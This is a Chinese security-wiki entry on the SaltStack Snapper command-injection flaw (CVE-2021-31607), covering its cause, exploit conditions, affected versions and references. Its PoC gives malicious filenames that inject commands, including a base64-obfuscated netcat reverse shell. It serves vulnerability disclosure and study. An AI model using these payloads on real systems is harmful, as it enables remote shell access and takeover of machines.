menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right --Vulnerability-main chevron_right SaltStack命令注入漏洞(CVE-2021-31607).md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    SaltStack命令注入漏洞(CVE-2021-31607).md
    842 B / 2021-05-21 09:14:38
        # SaltStack命令注入漏洞(CVE-2021-31607)
    
    在SaltStack的Snapper模块中存在命令注入漏洞,当master请求minion的diff时,minion会使用popen执行file命令判断目录下文件是否为文本文件,将文件名作为参数传递给file,当文件名包含恶意命令时可能导致命令注入漏洞,导致系统执行恶意命令。
    
    利用条件:
    
    1. master开启Snapper.diff模块
    2. minion内存在有恶意文件名的文件
    
    影响版本:
    
    saltstack 2016.9 到3002.6
    
    PoC:
    
    
    ```
    echo hi > '$(touch HACKED).txt'
    反弹shell:
    echo hi > '$(echo bmMgLWUgL2Jpbi9iYXNoIDEyNy4wLjAuMSA0NDQ0|base64 -d|sh -i).txt'
    ```
    
    ref:
    
    * https://sec.stealthcopter.com/saltstack-snapper-minion-privledge-escaltion/
    * https://nvd.nist.gov/vuln/detail/CVE-2021-31607
    * https://nox.qianxin.com/vulnerability/detail/97347
    
    links
    file_download